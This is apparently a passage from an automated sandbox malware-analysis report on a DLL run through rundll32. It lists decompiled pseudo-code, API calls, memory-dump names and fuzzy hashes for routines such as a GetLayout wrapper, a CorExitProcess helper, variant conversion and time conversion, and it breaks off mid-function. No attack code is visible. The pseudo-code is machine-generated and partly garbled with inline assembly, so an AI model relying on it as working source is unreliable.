                                                                                                            • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                                                            • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                                                            • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10028B90(signed int __ecx) {
                                                                                                            				_Unknown_base(*)()* _t3;
                                                                                                            				signed int _t7;
                                                                                                            				signed int _t8;
                                                                                                            
                                                                                                            				_t7 = __ecx;
                                                                                                            				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                                                            				if(_t3 == 0) {
                                                                                                            					_t8 = _t7 | 0xffffffff;
                                                                                                            					SetLastError(0x78);
                                                                                                            				} else {
                                                                                                            					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastModuleProc
                                                                                                            • String ID: GDI32.DLL$GetLayout
                                                                                                            • API String ID: 4275029093-2396518106
                                                                                                            • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                                                            • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                                                            • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 68%
                                                                                                            			E10011DCF(int _a4) {
                                                                                                            				struct HINSTANCE__* _t3;
                                                                                                            				_Unknown_base(*)()* _t4;
                                                                                                            
                                                                                                            				_t3 = GetModuleHandleA("mscoree.dll");
                                                                                                            				if(_t3 != 0) {
                                                                                                            					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                                                            					if(_t4 != 0) {
                                                                                                            						 *_t4(_a4);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				ExitProcess(_a4);
                                                                                                            			}






                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                                                            • ExitProcess.KERNEL32 ref: 10011DF8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressExitHandleModuleProcProcess
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 75539706-1276376045
                                                                                                            • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                                                            • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                                                            • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                            				CHAR* _t94;
                                                                                                            				void* _t100;
                                                                                                            				intOrPtr _t101;
                                                                                                            				void* _t108;
                                                                                                            				intOrPtr _t114;
                                                                                                            				void* _t116;
                                                                                                            				void* _t117;
                                                                                                            				void* _t120;
                                                                                                            				signed short _t123;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t128;
                                                                                                            				void* _t134;
                                                                                                            				char _t140;
                                                                                                            				CHAR* _t144;
                                                                                                            				intOrPtr* _t147;
                                                                                                            				void* _t149;
                                                                                                            				void* _t151;
                                                                                                            				intOrPtr _t153;
                                                                                                            				signed short* _t156;
                                                                                                            				void* _t157;
                                                                                                            				CHAR* _t159;
                                                                                                            				int _t161;
                                                                                                            				char* _t166;
                                                                                                            				void* _t167;
                                                                                                            				void* _t168;
                                                                                                            				void* _t170;
                                                                                                            				CHAR* _t171;
                                                                                                            				char* _t174;
                                                                                                            				CHAR* _t182;
                                                                                                            
                                                                                                            				_t153 = __edx;
                                                                                                            				_t148 = __ecx;
                                                                                                            				E10011BF0(0x1003b2f6, _t168);
                                                                                                            				_t171 = _t170 - 0x2c;
                                                                                                            				_t144 =  *(_t168 + 8);
                                                                                                            				_t94 = _t144[8];
                                                                                                            				 *(_t168 - 0x10) = _t171;
                                                                                                            				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
                                                                                                            				 *(_t168 - 0x11) = 0;
                                                                                                            				 *(_t168 + 8) = _t94;
                                                                                                            				if(_t94 == 0) {
                                                                                                            					 *(_t168 + 8) = _t168 - 0x11;
                                                                                                            				}
                                                                                                            				_t161 = lstrlenA( *(_t168 + 8));
                                                                                                            				 *(_t168 - 0x18) = _t144[0x10];
                                                                                                            				 *(_t168 - 0x1c) = _t144[0xc];
                                                                                                            				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
                                                                                                            					L7:
                                                                                                            					_t145 =  *(_t168 + 0x14);
                                                                                                            					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
                                                                                                            					_pop(_t149);
                                                                                                            					if(_t100 == 0) {
                                                                                                            						L9:
                                                                                                            						_t101 = 0x8007000e;
                                                                                                            						L47:
                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
                                                                                                            						return _t101;
                                                                                                            					}
                                                                                                            					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
                                                                                                            					 *(_t168 - 0x10) = _t171;
                                                                                                            					 *(_t168 + 0xc) = _t171;
                                                                                                            					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
                                                                                                            					_t174 =  &(_t171[0xc]);
                                                                                                            					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
                                                                                                            					_t38 =  &(_t156[8]); // 0x10
                                                                                                            					_t165 = _t38;
                                                                                                            					_t108 = E10001000(_t149, _t38);
                                                                                                            					_pop(_t151);
                                                                                                            					if(_t108 != 0) {
                                                                                                            						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
                                                                                                            						 *(_t168 - 0x10) = _t174;
                                                                                                            						_t166 = _t174;
                                                                                                            						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
                                                                                                            						_t147 = 0;
                                                                                                            						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
                                                                                                            						if(_t114 != 0) {
                                                                                                            							L17:
                                                                                                            							_t166 =  *(_t168 + 0x14);
                                                                                                            							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
                                                                                                            							_t157 = 0;
                                                                                                            							if(_t166[8] <= 0) {
                                                                                                            								L20:
                                                                                                            								_t101 =  *((intOrPtr*)(_t168 + 0x18));
                                                                                                            								if(_t101 != 0) {
                                                                                                            									goto L47;
                                                                                                            								}
                                                                                                            								_t156 =  *(_t168 + 0x10);
                                                                                                            								if(_t156 == 0) {
                                                                                                            									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
                                                                                                            									if(_t116 == 0) {
                                                                                                            										if(_t147 != 0) {
                                                                                                            											__imp__#6(_t147);
                                                                                                            										}
                                                                                                            										L46:
                                                                                                            										_t101 = 0;
                                                                                                            										goto L47;
                                                                                                            									}
                                                                                                            									_t117 = _t116 - 1;
                                                                                                            									if(_t117 == 0) {
                                                                                                            										L41:
                                                                                                            										if(_t147 != 0) {
                                                                                                            											 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                                                            										}
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									_t120 = _t117 - 3;
                                                                                                            									if(_t120 == 0) {
                                                                                                            										__imp__#9(_t168 - 0x34);
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									if(_t120 != 1) {
                                                                                                            										goto L46;
                                                                                                            									}
                                                                                                            									goto L41;
                                                                                                            								}
                                                                                                            								_t123 =  *(_t168 - 0x1c);
                                                                                                            								 *_t156 = _t123;
                                                                                                            								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
                                                                                                            								if(_t125 > 0x13) {
                                                                                                            									goto L46;
                                                                                                            								}
                                                                                                            								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
                                                                                                            									case 0:
                                                                                                            										L35:
                                                                                                            										 *(__edi + 8) = __bx;
                                                                                                            										goto L46;
                                                                                                            									case 1:
                                                                                                            										 *(__edi + 8) = __ebx;
                                                                                                            										goto L46;
                                                                                                            									case 2:
                                                                                                            										__eax =  *(__ebp - 0x34);
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										goto L46;
                                                                                                            									case 3:
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										goto L46;
                                                                                                            									case 4:
                                                                                                            										__eax =  *(__ebp - 0x34);
                                                                                                            										 *(__edi + 8) =  *(__ebp - 0x34);
                                                                                                            										__eax =  *(__ebp - 0x30);
                                                                                                            										 *(__edi + 0xc) =  *(__ebp - 0x30);
                                                                                                            										goto L46;
                                                                                                            									case 5:
                                                                                                            										__ebx =  ~__ebx;
                                                                                                            										asm("sbb ebx, ebx");
                                                                                                            										goto L35;
                                                                                                            									case 6:
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										asm("movsd");
                                                                                                            										goto L46;
                                                                                                            									case 7:
                                                                                                            										goto L46;
                                                                                                            									case 8:
                                                                                                            										 *(__edi + 8) = __bl;
                                                                                                            										goto L46;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								__imp__#9( *(_t168 + 0xc));
                                                                                                            								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
                                                                                                            								_t157 = _t157 + 1;
                                                                                                            							} while (_t157 < _t166[8]);
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
                                                                                                            						 *(_t168 - 4) = 0;
                                                                                                            						if(_t128 == 4) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							 *(_t168 + 8) = _t182;
                                                                                                            							 *(_t168 - 0x34) =  *(_t168 + 8);
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						if(_t128 == 5) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							asm("fst qword [ebp-0x24]");
                                                                                                            							L27:
                                                                                                            							 *(_t168 - 0x34) = _t182;
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						if(_t128 == 7) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							E1003A087();
                                                                                                            							asm("fst qword [ebp-0x24]");
                                                                                                            							goto L27;
                                                                                                            						}
                                                                                                            						if(_t128 <= 0x13 || _t128 > 0x15) {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							_t147 = E1003A087();
                                                                                                            						} else {
                                                                                                            							_push(_t156);
                                                                                                            							_push(_t166);
                                                                                                            							_push( *(_t168 - 0x18));
                                                                                                            							 *(_t168 - 0x34) = E1003A087();
                                                                                                            							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
                                                                                                            						}
                                                                                                            						goto L17;
                                                                                                            					}
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				_t17 = _t161 + 3; // 0x3
                                                                                                            				_t158 = _t17;
                                                                                                            				_t134 = E10001000(_t148, _t17);
                                                                                                            				_pop(_t148);
                                                                                                            				if(_t134 == 0) {
                                                                                                            					goto L9;
                                                                                                            				}
                                                                                                            				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
                                                                                                            				 *(_t168 - 0x10) = _t171;
                                                                                                            				_t159 = _t171;
                                                                                                            				E10011440(_t159,  *(_t168 + 8), _t161);
                                                                                                            				_t140 = _t144[0xc];
                                                                                                            				_t171 =  &(_t171[0xc]);
                                                                                                            				 *(_t168 + 8) = _t159;
                                                                                                            				if(_t140 == 8) {
                                                                                                            					_t140 = 0xe;
                                                                                                            				}
                                                                                                            				_t159[_t161] = 0xff;
                                                                                                            				_t167 = _t161 + 1;
                                                                                                            				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
                                                                                                            				_t159[_t167] = _t140;
                                                                                                            				_t159[_t167 + 1] = 0;
                                                                                                            				 *(_t168 - 0x18) = _t144[0x14];
                                                                                                            				goto L7;
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 100394B5
                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
                                                                                                            • VariantClear.OLEAUT32(0000000C), ref: 1003963C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClearH_prologVariantlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2416264355-0
                                                                                                            • Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
                                                                                                            • Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
                                                                                                            • Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10018BEF(intOrPtr* _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr* _t89;
                                                                                                            				void* _t90;
                                                                                                            				void* _t101;
                                                                                                            				intOrPtr _t112;
                                                                                                            				void* _t115;
                                                                                                            				signed int _t120;
                                                                                                            				signed int _t125;
                                                                                                            				intOrPtr _t132;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t138;
                                                                                                            				intOrPtr _t140;
                                                                                                            				signed int _t142;
                                                                                                            				signed int _t143;
                                                                                                            				signed int _t146;
                                                                                                            				signed int _t147;
                                                                                                            				signed int _t148;
                                                                                                            				signed int _t149;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t152;
                                                                                                            				void* _t159;
                                                                                                            				intOrPtr _t162;
                                                                                                            				signed int _t164;
                                                                                                            				signed int _t165;
                                                                                                            				void* _t168;
                                                                                                            				void* _t169;
                                                                                                            				void* _t170;
                                                                                                            				void* _t172;
                                                                                                            				intOrPtr* _t173;
                                                                                                            				intOrPtr _t174;
                                                                                                            				void* _t176;
                                                                                                            				intOrPtr _t180;
                                                                                                            
                                                                                                            				_t89 = _a4;
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t133 =  *((intOrPtr*)(_t89 + 4));
                                                                                                            				_t162 =  *_t89;
                                                                                                            				_v24 = _t162;
                                                                                                            				_v20 = _t133;
                                                                                                            				_t90 = E1001519D(_t162);
                                                                                                            				_t174 = _t133;
                                                                                                            				_t172 = _t90;
                                                                                                            				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
                                                                                                            					L28:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t176 = _t133 - 0x1000;
                                                                                                            					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
                                                                                                            						goto L28;
                                                                                                            					} else {
                                                                                                            						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
                                                                                                            							L9:
                                                                                                            							_t173 =  *((intOrPtr*)(_t172 + 0x44));
                                                                                                            							L10:
                                                                                                            							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
                                                                                                            							_t10 = _t142 + 0x12b; // 0xe5
                                                                                                            							asm("cdq");
                                                                                                            							_t15 = _t142 - 1; // -71
                                                                                                            							_v16 = _t15;
                                                                                                            							_v8 = _t142;
                                                                                                            							asm("cdq");
                                                                                                            							_t164 = 0x64;
                                                                                                            							_t165 = 4;
                                                                                                            							asm("cdq");
                                                                                                            							_t28 = _v16 / _t165 - 0x11; // 0xd4
                                                                                                            							asm("cdq");
                                                                                                            							_t29 = _t142 - 0x46; // -140
                                                                                                            							asm("cdq");
                                                                                                            							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
                                                                                                            							asm("sbb edx, ebx");
                                                                                                            							_t138 = 0x15180;
                                                                                                            							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
                                                                                                            							asm("adc [ebp-0x10], edx");
                                                                                                            							_t180 = _v20;
                                                                                                            							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
                                                                                                            								asm("cdq");
                                                                                                            								_t143 = 4;
                                                                                                            								if(_v8 % _t143 != 0) {
                                                                                                            									L19:
                                                                                                            									asm("cdq");
                                                                                                            									_t158 = (_v8 + 0x76c) % 0x190;
                                                                                                            									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                                                            										goto L21;
                                                                                                            									}
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								asm("cdq");
                                                                                                            								_t149 = 0x64;
                                                                                                            								_t158 = _v8 % _t149;
                                                                                                            								if(_v8 % _t149 != 0) {
                                                                                                            									goto L20;
                                                                                                            								}
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								_t125 = _v16;
                                                                                                            								_v8 = _t125;
                                                                                                            								_t168 = _t168 + 0x1e13380;
                                                                                                            								asm("adc dword [ebp-0x10], 0x0");
                                                                                                            								asm("cdq");
                                                                                                            								_t150 = 4;
                                                                                                            								if(_t125 % _t150 != 0) {
                                                                                                            									L15:
                                                                                                            									asm("cdq");
                                                                                                            									_t158 = (_v8 + 0x76c) % 0x190;
                                                                                                            									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                                                            										L21:
                                                                                                            										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
                                                                                                            										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
                                                                                                            										asm("cdq");
                                                                                                            										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
                                                                                                            										asm("adc [ebp-0x10], edx");
                                                                                                            										_t159 = 0x1004ce98;
                                                                                                            										if(_v12 == 0) {
                                                                                                            											_t159 = 0x1004cecc;
                                                                                                            										}
                                                                                                            										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
                                                                                                            										_t146 = 1;
                                                                                                            										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
                                                                                                            											L27:
                                                                                                            											_t147 = _t146 - 1;
                                                                                                            											 *(_t173 + 0x10) = _t147;
                                                                                                            											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
                                                                                                            											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
                                                                                                            											_t148 = 7;
                                                                                                            											asm("cdq");
                                                                                                            											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
                                                                                                            											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
                                                                                                            											asm("cdq");
                                                                                                            											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
                                                                                                            											asm("adc [ebp-0x10], edx");
                                                                                                            											_t120 = E10013780(_t170, _v20, 0x3c, 0);
                                                                                                            											 *(_t173 + 4) = _t120;
                                                                                                            											 *_t173 = _t170 - _t120 * 0x3c;
                                                                                                            											 *((intOrPtr*)(_t173 + 0x20)) = 0;
                                                                                                            											return _t173;
                                                                                                            										} else {
                                                                                                            											_t140 = _t112;
                                                                                                            											do {
                                                                                                            												_t146 = _t146 + 1;
                                                                                                            											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
                                                                                                            											_t138 = 0x15180;
                                                                                                            											goto L27;
                                                                                                            										}
                                                                                                            									}
                                                                                                            									L16:
                                                                                                            									_t168 = _t168 + _t138;
                                                                                                            									asm("adc dword [ebp-0x10], 0x0");
                                                                                                            									L20:
                                                                                                            									_v12 = 1;
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								asm("cdq");
                                                                                                            								_t152 = 0x64;
                                                                                                            								_t158 = _v8 % _t152;
                                                                                                            								if(_v8 % _t152 != 0) {
                                                                                                            									goto L16;
                                                                                                            								}
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t132 = E100107B6(0x24);
                                                                                                            						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
                                                                                                            						if(_t132 != 0) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						_t173 = 0x1004f744;
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}









































                                                                                                            0x10018c49
                                                                                                            0x10018c4c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x00000000
                                                                                                            0x10018c4e
                                                                                                            0x10018c29

                                                                                                            APIs
                                                                                                              • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                                                              • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                                                              • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                                                              • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                                                              • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 223281555-0
                                                                                                            • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                                                            • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                                                            • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E1002D821(intOrPtr __ecx, void* __edx) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t70;
                                                                                                            				signed char _t75;
                                                                                                            				signed int _t80;
                                                                                                            				signed int _t81;
                                                                                                            				signed int _t85;
                                                                                                            				signed int _t87;
                                                                                                            				void* _t95;
                                                                                                            				intOrPtr _t125;
                                                                                                            				intOrPtr _t133;
                                                                                                            				void* _t147;
                                                                                                            				void* _t151;
                                                                                                            				intOrPtr _t155;
                                                                                                            				void* _t158;
                                                                                                            				void* _t160;
                                                                                                            
                                                                                                            				_t147 = __edx;
                                                                                                            				_t158 = _t160 - 0xb0;
                                                                                                            				_t70 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                                                            				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
                                                                                                            				_t125 = __ecx;
                                                                                                            				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
                                                                                                            				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
                                                                                                            					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
                                                                                                            						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
                                                                                                            					}
                                                                                                            					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
                                                                                                            					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
                                                                                                            					 *(_t125 + 0x7c) = _t75;
                                                                                                            					if((_t75 & 0x00000040) == 0) {
                                                                                                            						_push(0x104);
